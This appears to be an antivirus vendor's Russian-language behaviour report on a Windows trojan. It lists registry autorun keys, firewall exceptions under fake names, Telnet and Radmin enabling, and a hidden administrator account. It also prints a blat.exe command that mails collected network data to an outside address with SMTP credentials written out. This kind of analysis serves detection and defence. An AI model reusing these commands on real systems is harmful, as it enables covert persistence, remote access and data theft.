Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'NTAuthEnabled' = '<SYSTEM32>\mui\start.exe'
Создает или изменяет следующие файлы:
- %WINDIR%\Tasks\security.job
- %WINDIR%\Tasks\SA.DAT
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\Schedule] 'Start' = '00000002'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\mui\r_server.exe' = '<SYSTEM32>\mui\r_server.exe:*:Enabled:Google Box'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:Mail Guard Internet'
Создает и запускает на исполнение:
- <SYSTEM32>\mui\blat.exe -charset win-1251 -to ertry@inbox.ru -subject "Данные о клиенте!" -bodyF <SYSTEM32>\mui\confip.dat -install -server mail.rambler.ru -port 25 -f rosliguk1@rambler.ru -u rosliguk1 -pw R3c0Fn58JqSN
- <SYSTEM32>\mui\start.exe
Запускает на исполнение:
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v NTAuthEnabled /t REG_SZ /d <SYSTEM32>\mui\start.exe /f
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\schtasks.exe /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr <SYSTEM32>\mui\start.exe
- <SYSTEM32>\sc.exe config Schedule start= auto
- <SYSTEM32>\net1.exe start Schedule
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-NTLM
- <SYSTEM32>\ipconfig.exe /all
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters" /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\netsh.exe firewall add allowedprogram "<SYSTEM32>\tlntsvr.exe" "Mail Guard Internet" ENABLE
- <SYSTEM32>\netsh.exe firewall add allowedprogram "<SYSTEM32>\mui\r_server.exe" "Google Box" ENABLE
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\starts.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\start.bat" "
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_388955a0 /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388955a0 /t REG_DWORD /d 0 /f
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388955a0 /del
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- <SYSTEM32>\net1.exe user SUPPORT_388955a0 hacks /add
Изменения в файловой системе:
Создает следующие файлы:
- <SYSTEM32>\mui\blat.lib
- <SYSTEM32>\mui\blat.exe
- <SYSTEM32>\mui\raddrv.dll
- <SYSTEM32>\mui\blat.dll
- <SYSTEM32>\mui\confip.dat
- %TEMP%\2.tmp\start.bat
- <SYSTEM32>\mui\start.exe
- <SYSTEM32>\mui\r_server.exe
- <Текущая директория>\blat.exe
- <Текущая директория>\blat.dll
- %TEMP%\1.tmp\starts.bat
- <Текущая директория>\blat.lib
- <Текущая директория>\start.exe
- <Текущая директория>\raddrv.dll
- <Текущая директория>\r_server.exe
Удаляет следующие файлы:
- <Текущая директория>\start.exe
- <Текущая директория>\blat.dll
- <SYSTEM32>\mui\confip.dat
- %TEMP%\1.tmp\starts.bat
- <Текущая директория>\raddrv.dll
- <Текущая директория>\r_server.exe
- <Текущая директория>\blat.lib
- <Текущая директория>\blat.exe
Сетевая активность:
Подключается к:
- 'ma##.rambler.ru':25
UDP:
- DNS ASK ma##.rambler.ru
Другое:
Ищет следующие окна:
- ClassName: 'Indicator' WindowName: ''
